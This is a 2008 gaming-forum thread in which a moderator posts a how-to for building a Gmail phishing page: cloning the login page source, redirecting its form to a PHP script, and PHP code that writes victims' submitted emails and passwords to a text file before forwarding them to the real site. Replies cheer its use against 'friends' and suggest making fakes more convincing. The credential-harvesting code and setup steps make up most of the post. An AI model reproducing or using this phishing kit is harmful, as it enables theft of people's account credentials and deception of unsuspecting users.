Live Help
Membership
You are a guest!

Register Today!

Log In
Reset Password
Game Network
Community Forum

MMO GAME LIST
World of Warcraft
Age of Conan
Anarchy Online
Archlord
Cabal Online
City of Heroes
City of Villains
Dark Age of Camelot
Darkfall Online
Diablo 2
Dungeons and Dragons
Dofus
Eve Online
Everquest 2
Final Fantasy XI
Guild Wars
Hero Online
Knight Online
Lineage 2
Lord of the Rings Online
Maple Story
Ragnarok Online
Runescape 2
Second Life
SilkRoad Online
Star Wars Galaxies
Tibia
Warhammer Online

FPS GAME LIST
Call of Duty
Combat Arms
Counter Strike
Halo

Welcome Guest ( Log In | Register )

> Phishing
post Oct 17 2008, 04:43 AM
Post #1

mistikman



Egotistical Sociopathic Perfectionist
Group Icon

Group: Moderator
Posts: 1,398
Joined: 2-July 07
From: Never never land.
Member No.: 353,738






xX-=MistiKmans guide on phishing=-Xx
Hey, sorry if this is not allowed haven't exactly read the rules, I just follow general conduct. If this isn't allowed please delete it.
I am going to explain it and explain the basic way of setting up a phishing site.

Alright phishing is when you create a login page that looks just like it does on the regular websites. Except when they actually do login, the informaiton they'd put into the forms is sent to and saved into a file you have stored. If you have not got this file it'll just create it for you. :D Well... That's if you set it up right. ^_^
Well that's really all phishing is, if you don't understand it why are you on this site? You're ruining it's credability.

Now setting it up is actually quite simple. Although I cannot do it... Only cos I'm trying for RuneScape and I dunno how to do it... Also, I'm trying to make my own I'm not using a premade one. I'll explain for Gmail, because that's really easy.

You go to a free website hosting site. A good one to use is T35. Create a new file either on the site, or if you can't do that go to the the site you're planning to phish for, in this case, Gmail. Right click somehwere, where it isn't an applet, media thingy etc. So you've right clicked and then hopefully not come back here, because if you were smart you would have read this entire thing first. So yeah, Right click and click view page source. Save the notepad file that comes up. The save thingy will show up, save it as "index.php" obviously without the qutation marks. Make sure you select all files in the drop down menu under the box where you type in a name to save it as. So it would look like this:
|---------------------|
|Index.php |<--- Name entry
|_______________|
|---------------------|
|All files |<--- File type to save it as
|_______________|
And of course click save just over there next to cancel --->
Now You should have done this before you saved it to make it easier, but I was too lazy to type it then.
In the notepad document Press Ctrl+F the find box will show up, type in "action=" I'm sure by now you're smart enough to figure out not to put in the quotation marks, otherwise you wouldn't be up to here. Now it will highlight action="some site name here" <---That site name will be somehting to do with Gmail, because that's what you SHOULD be testing this on. Replace the site name with "login.php"
Now create a new document. It will also be a .php so open up notepad. Copy and paste this:
CODE
$stuff = "Email: " . $_POST["Email"] . "Password: " . $_POST["Passwd"] . "\r\n\n";
$file = fopen("passwords.txt","a");
fwrite($file,$stuff);
fclose($file);
That is for Gmail, if you want to use it for something else put this in instead.
CODE
$file = fopen("passwords.txt","a");
foreach($_POST as $variable => $value)
{
fwrite($f, $variable . " = " . $value . "\r\n\n";
}
fclose($file);
header("location: http://gmail.com");
Just replace where it says "Location: http://gmail.com" with whatever site you're using. Now save that file. You don't need to create password.txt it will make the file itself.
Before you go on, if you're going to do this with Gmail you might want to into the index page and edit it. Find "google_transparent.gif" and replace it with this:
CODE
https://www.google.com/accounts/google_transparent.gif
That will bring up the google banner instead of showing nothing. If you're creating a phishing site for something else, it is very handy to do this. Ok, save that. Upload both of them to your website, Now test it. Try to login, you don't even have to use a real account and when it's done loading go into the newly generated passwords.txt file, which will be in the directory on the website hoster. Open it and just scroll through you'll figure it out and you'll find the username and password you'd put in. There you go that is your guide.

May I please get this stickied? If it's allowed of course. ^_^


--------------------
SIGNATURE!

Go to the top of the page
 
+Quote Post
 
Start new topic
Replies (1 - 3)
post Oct 17 2008, 04:43 AM
Post #

Elite Membership


To get the most out of MmorpGuides.com, please view the following information.












Already a Member?

With an Elite Membership you can. . .

  • Reach the highest levels in no time
  • Have one of the most powerful characters in your game
  • Become a valuable member of your clan or guild
  • Become part of a caring and helpful community of gamers

Elite Members enjoy. . .

  • 1,660+ Cheats - tons of working, high quality cheats
  • 1,550+ Guides - We have one of the most comprehensive collections of guides on the net
  • 539+ Bots and macros - Level up quickly, even while you sleep!
  • A chance to win free prizes such as an amazing Playstation 3! And free gold and powerleveling!

No risk, only huge benefits!

  • Your investment can pay for itself in days!
  • Earn gold that you can trade for real money
  • Sell your high level items and characters for a profit!
  • Get tons of expensive guides and cheats in one spot for one small price

Money Back Guarantee!

Not 100% satisfied? We have a 24 hour, money-back guarantee! Contact us for a prompt and courteous refund!

Upgrade to an Elite Membership now!

Not A Member?

Join today and get access to all these great features!

  • Access to newly submitted cheats and guides
  • Download newly submitted bots and macros
  • Chat about your favorite game
  • Submit working content for a FREE Elite Membership!
  • And lots more!
Register Today!
Go to the top of the page
 
Quote Post
post Oct 18 2008, 03:48 PM
Post #2

Protectors



Master
Group Icon

Group: Elite Members
Posts: 426
Joined: 17-July 08
From: In the howling North where there used to be snow
Member No.: 690,180






Nice... time to "play" with some "friends" of me if they make me angry
biggrin.gif biggrin.gif biggrin.gif biggrin.gif


--------------------


The common sense is not so common as you think. So what is common sense then? Dos it even exist?

Go to the top of the page
 
+Quote Post
post Jun 1 2009, 07:19 PM
Post #3

plagued venom



Master
*******

Group: Members
Posts: 221
Joined: 29-October 08
From: United Kingdom
Member No.: 762,957






Also knowing HTML,FLASH,C++ AND VB6 MAKES YOUR PHISHERS LOOK MORE REALISTIC
Go to the top of the page
 
+Quote Post
post Jun 18 2009, 11:05 PM
Post #4

tony2108



Master
Group Icon

Group: Elite Members
Posts: 212
Joined: 15-May 08
From: LLocahost
Member No.: 637,925






yes but what about the hosts?


--------------------

Colosus productions Presents working and clean hacks,cracks & cheats "Colosian" project

_______________________ _$$$$$$$___ _______
________________________$$$$$$$$$$_______ _
________________________$$$$$$$$$$$_______
_________________________$$$$$$$$$$$$$$___
__________________________$$$$$$$$$$$_____
_____________________________$$$$$$$$$$$$$
___________________________$$$$$$$$$$_____
_________________________$$$$$$$$$$$$$$$__
________________$$$______$$$$$$$$$$$$$$___
______________$$$$$$$$_____$$$$$$__$$$$$__
_____________$$$$$$$$$$_____$$$$____$$$$$_
___________$$$$$$_$$$$$$$$__$$$$______$$$$
__________$$$$$_____$$$$$$$$_$$$$_______$$$
___ _____$$$$$_________$$$$$$$$$$$$_______$$$
_______ $$$_____________$$$$$$$$$$$________$$$
_____$$$__ ______________$$$$$$$$$$________$$$$$$
__$$$$$$__ ________________$$$$$$$_________
Go to the top of the page
 
+Quote Post

Reply to this topicStart new topic

 


> Board Footer
Time is now: 22nd March 2010 - 09:04 AM